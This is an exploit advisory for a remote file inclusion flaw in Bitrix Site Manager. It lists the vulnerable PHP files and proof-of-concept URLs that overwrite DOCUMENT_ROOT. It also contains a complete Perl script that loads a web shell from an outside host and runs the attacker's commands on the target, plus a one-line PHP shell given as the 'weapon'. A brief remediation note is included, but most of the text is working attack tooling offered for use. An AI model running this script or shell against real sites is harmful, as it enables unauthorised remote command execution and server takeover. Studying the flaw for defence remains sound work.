##### # [+] Author : Don Tukulesto (root@indonesiancoder.com) # [+] Date : November 13, 2009 # [+] Homepage : http://www.indonesiancoder.com # [+] Vendor : http://www.bitrixsoft.com/ # [+] Method : Remote File Inclusion # [+] Location : INDONESIA # [~] Notes : I know this is an old bug, but I just wrote this exploit using Perl modules. # [~] Reference : http://www.securityfocus.com/bid/13965 # [~] How To : # perl tux.pl <target> <weapon url> cmd # perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd # Weapon example: <?php system($_GET['cmd']); ?> ##### <!--more--> # [-] Bugs in (each file below builds its include path from $_SERVER["DOCUMENT_ROOT"]; the PoC works only where PHP's register_globals lets a request parameter overwrite that value and remote includes are permitted, so disabling register_globals and allow_url_include, or upgrading, closes the hole) [+] rss.php <pre lang="php"> <? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/iblock/rss.php"); ?> </pre> [+] redirect.php <pre lang="php"> <? define("GENERATE_EVENT","Y"); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if (CModule::IncludeModule("statistic")) { $goto = eregi_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto); } else { $goto = eregi_replace("#EVENT_GID#","",$goto); } LocalRedirect($goto); ?> </pre> [+] click.php <pre lang="php"> <? define("GENERATE_EVENT","Y"); require_once($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php"); if (intval($id)>0 and CModule::IncludeModule("advertising")) CAdvBanner::Click($id); if (CModule::IncludeModule("statistic")) $goto = str_replace("#EVENT_GID#",CStatEvent::GetGID(),$goto); LocalRedirect($goto); ?> </pre> [+] admin/index.php <pre lang="php"> <? require_once(dirname(__FILE__)."/../modules/main/include/prolog_admin_before.php"); include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php"); ?> <? 
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/index.php"); include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php"); ?> </pre> [+] tools/help.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help.php");?> </pre> [+] tools/calendar.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/calendar.php");?> </pre> [+] tools/ticket_show_file.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/support/admin/ticket_show_file.php");?> </pre> [+] tools/imagepg.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/imagepg.php");?> </pre> [+] tools/help_view.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_view.php");?> </pre> [+] tools/help_create.php <pre lang="php"> <?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/tools/help_create.php");?> </pre> [-] PoC http://127.0.0.1/BX_ROOT/rss.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/click.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/redirect.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/admin/index.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help_create.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help_view.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/imagepg.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/ticket_show_file.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/calendar.php?_SERVER[DOCUMENT_ROOT]= http://127.0.0.1/BX_ROOT/tools/help.php?_SERVER[DOCUMENT_ROOT]= [-] eXpL0!t c0des <pre lang="perl"> #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; $RoNz = $ARGV[0]; $Pathloader = $ARGV[1]; $Contrex = $ARGV[2]; if($RoNz!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()} head(); sub head() { print "[o]============================================================================[o]\r\n"; print " | Bitrix Site 
Manager Multiple Remote File Include Vulnerability |\r\n"; print "[o]============================================================================[o]\r\n"; } while() { print "[w00t] \$"; while(<STDIN>) { $kaMtiEz=$_; chomp($kaMtiEz); $arianom = LWP::UserAgent->new() or die; $tiw0L = HTTP::Request->new(GET =>$RoNz.'admin/index.php?_SERVER[DOCUMENT_ROOT]='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n"; $abah_benu = $arianom->request($tiw0L); $tukulesto = $abah_benu->content; $tukulesto =~ tr/[\n]/[�]/; if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";} elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit} elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"} if($tukulesto =~ /(.*)/) { $finreturn = $1; $finreturn=~ tr/[�]/[\n]/; print "\r\n$finreturn\n\r"; last; } else {print "[w00t] \$";}}}last; sub usage() { head(); print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n"; print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n"; print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n"; print " | <cmd> - Command variable used in php shell |\r\n"; print "[o]============================================================================[o]\r\n"; print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n"; print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n"; print " | M364TR0N, TUCKER, Ian Petrucii, kecemplungkalen, NoGe, bh4nd55, MainHack.Net |\r\n"; print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n"; print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! 
|\r\n"; print "[o]============================================================================[o]\r\n"; print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n"; print "[o]============================================================================[o]\r\n"; exit(); } </pre>